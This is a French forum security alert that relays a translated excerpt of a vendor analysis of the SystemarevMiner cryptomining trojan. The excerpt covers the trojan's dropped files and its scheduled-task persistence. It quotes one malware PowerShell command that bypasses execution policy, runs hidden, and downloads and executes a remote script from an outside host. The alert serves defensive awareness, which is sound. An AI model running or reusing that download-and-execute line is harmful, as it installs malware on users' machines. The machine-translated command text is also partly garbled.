Cryptominer (minage) SystemarevMiner (17.07.18)

Avis et alertes de sécurité au jour le jour (aucune question posée dans ce sous-forum)

Modérateur: Modérateurs et Modératrices

Cryptominer (minage) SystemarevMiner (17.07.18)

Messagede pierre » 18 Juil 2018, 10:33

Cryptominer (minage de cryptomonaie) nommé SystemarevMiner

Qiho 360, une société chinoise de sécurité informatique, publie un papier aujourd'hui : l'éradication du cryptominer "SystemarevMiner" est insuffisante car il se réinstalle automatiquement.

Extraits traduits :

360 Security Center a récemment trouvé un cheval de Troie de type Cryptominer qui se répand activement dans la nature. Ce cheval de Troie cache les malwares de cryptojacking derrière certaines tâches planifiées pour éviter la détection du logiciel antivirus. De plus, même si le cheval de Troie est déjà détecté et supprimé, le cheval de Troie peut toujours être en vie tant que le fichier de script existe. Nous l'avons nommé "SystemarevMiner".

Une analyse

Le cheval de Troie est principalement installé sur l'ordinateur de l'utilisateur via le plug-in du jeu et les failles du logiciel. Relâchez les fichiers suivants après avoir téléchargé le package d'installation:
c: \ programmes \ systemarev \ revservicesx \ app_loader.exe
c: \ program files \ systemarev \ revservicesx \ systemupdate64x.exe
C: \ Program Files \ Fichiers communs \ restore_rev.bat

Créez plusieurs tâches planifiées et programmes de démarrage de service:

Le fichier restore_rev.bat est défini comme propriété masquée et ajouté aux tâches planifiées. Le fichier batch utilisera Powershell pour télécharger le nouveau script de cheval de Troie Powershell:
powershell -ExecutionPolicy ByPass -WindowStyle Caché -Command "iex ((nouvel-objet net.webclient) .DownloadString ('http://77.super-me.online/files/restore_rev_inj.ps1'))"

Vos antivirus sont là pour analyser ce qui se passe.

Cordialement,
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 24497
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Retourner vers Alertes

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 9 invités